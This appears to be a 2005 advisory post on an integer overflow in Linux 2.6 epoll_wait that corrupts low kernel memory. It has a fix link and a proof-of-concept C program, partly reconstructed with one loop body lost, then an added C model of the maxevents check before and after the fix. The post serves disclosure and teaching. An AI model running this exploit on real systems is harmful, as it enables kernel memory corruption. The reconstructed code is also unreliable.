overwriting low kernel memory

ino | 2005.03.23 15:02 | views 1370
It is possible to partially overwrite low kernel memory (kernels >= 2.6 and <= 2.6.11) due to an integer overflow in sys_epoll_wait and misuse of __put_user in ep_send_events.


Tested on i386.
Despite the overflow, the OS seemingly continues normal operation.


fix:
http://linux.bkbits.net:8080/linux-2.6/cset@422dd06a1p5PsyFhoGAJseinjEq3ew?nav=index.html|ChangeSet@-1d


-------------------------------------------------
/*
 * copyright georgi guninski.
 * cannot be used in vulnerabilities databases like securityfocus and mitre
 * */
/* The header names were stripped when this page was extracted; they are
 * restored here from the functions the code uses. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/epoll.h>
/* TASK_SIZE is only exposed by the kernel headers when __KERNEL__ is
 * defined; asm/processor.h is assumed, the original header name was lost. */
#define __KERNEL__
#include <asm/processor.h>
#undef __KERNEL__


#define MAXV 500


int main(int argc, char **argv)
{
    int epfd;
    int i;
    int res;
    struct epoll_event ev;
    int *fds;
    int over;
    void *km;

    /* maxevents is chosen so that over * sizeof(struct epoll_event) no longer
     * fits in 32 bits: on i386 (12-byte events) the product wraps to 8, so
     * the kernel's access check covers only 8 bytes of the buffer. */
    over = ((unsigned int)-1) / sizeof(struct epoll_event) + 1;
    /* The buffer is placed just below TASK_SIZE, so the few checked bytes lie
     * in user space while the events actually stored run past the boundary. */
    km = (void *)(TASK_SIZE - over * sizeof(struct epoll_event) - 4);
    printf("sizeof=%d %x %lx\n", sizeof(struct epoll_event), over, (unsigned long)km);


    epfd = epoll_create(MAXV);
    printf("Epoll descriptor %i\n", epfd);
    fds = calloc(2 * MAXV, sizeof(int));
    /* Register MAXV socketpair ends; EPOLLOUT is ready on each of them at
     * once, so epoll_wait has many events to store. */
    for (i = 0; i < MAXV; i++) {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, &fds[2 * i])) perror("pair");
        ev.data.u32 = 0x42424242;
        ev.events = EPOLLOUT | EPOLLIN | 0x42424242;
        res = epoll_ctl(epfd, EPOLL_CTL_ADD, fds[2 * i], &ev);
    }
    /* for (i = 0; i < MAXV; i++) ...  -- the body of this loop was lost when
     * the page was extracted and is not reconstructed here. */

    system("sync");


    for (i = 0; i < 1; i++)
    {
        /* ep_send_events stores each ready event with __put_user, which does
         * no range check of its own; it relies on the check done above. */
        res = epoll_wait(epfd, km, over, -1);
        printf("epoll_wait returned %i\n", res);
        printf("check what is after TASK_SIZE\n");
    }


    close(epfd);
    return 42;
}
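As an added example (not code from the original post or from the kernel), the following C model shows why the maxevents check in sys_epoll_wait could be satisfied by the value the PoC passes, and how an upper bound of the kind the fix introduced closes the hole. It assumes the i386 values the advisory relies on (12-byte epoll_event, 3 GiB TASK_SIZE); EP_MAX_EVENTS, old_check_passes and new_check_passes are the example's own names, and the simple range check stands in for the kernel's verify_area call.

```c
/* Added example: the maxevents check before and after the fix, in 32-bit
 * unsigned arithmetic so the multiplication wraps exactly as on i386.
 * Constants are the i386 values; EP_MAX_EVENTS is modelled on the fix. */
#include <stdint.h>
#include <stdio.h>
#include <limits.h>

#define EV_SIZE       12u          /* sizeof(struct epoll_event) on i386 */
#define TASK_SIZE     0xC0000000u  /* default i386 user/kernel split */
#define EP_MAX_EVENTS (INT_MAX / EV_SIZE)

/* Byte count the pre-fix code derives from maxevents: wraps modulo 2^32. */
uint32_t wrapped_bytes(int maxevents)
{
    return (uint32_t)maxevents * EV_SIZE;
}

/* Pre-fix logic: the only guard is maxevents > 0, then the (possibly wrapped)
 * byte count is range-checked against the user/kernel boundary. A wrapped
 * count makes a buffer just below TASK_SIZE look like a tiny, valid range. */
int old_check_passes(int maxevents, uint32_t buf)
{
    if (maxevents <= 0)
        return 0;
    uint32_t bytes = wrapped_bytes(maxevents);
    return buf + bytes >= buf && buf + bytes <= TASK_SIZE;
}

/* Post-fix logic: bound maxevents before multiplying, so the byte count can
 * never wrap and the range check means what it says. */
int new_check_passes(int maxevents, uint32_t buf)
{
    if (maxevents <= 0 || (uint32_t)maxevents > EP_MAX_EVENTS)
        return 0;
    uint32_t bytes = wrapped_bytes(maxevents);   /* cannot wrap here */
    return buf + bytes >= buf && buf + bytes <= TASK_SIZE;
}

int main(void)
{
    /* Same maxevents value the PoC computes; the buffer sits 12 bytes below
     * TASK_SIZE, so only its first event slot is in user space. */
    int over = (int)(UINT32_MAX / EV_SIZE + 1);
    uint32_t km = TASK_SIZE - wrapped_bytes(over) - 4;
    printf("maxevents=%d checks only %u bytes at %#x\n", over, wrapped_bytes(over), km);
    printf("pre-fix check passes: %d, post-fix check passes: %d\n",
           old_check_passes(over, km), new_check_passes(over, km));
    return 0;
}
```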
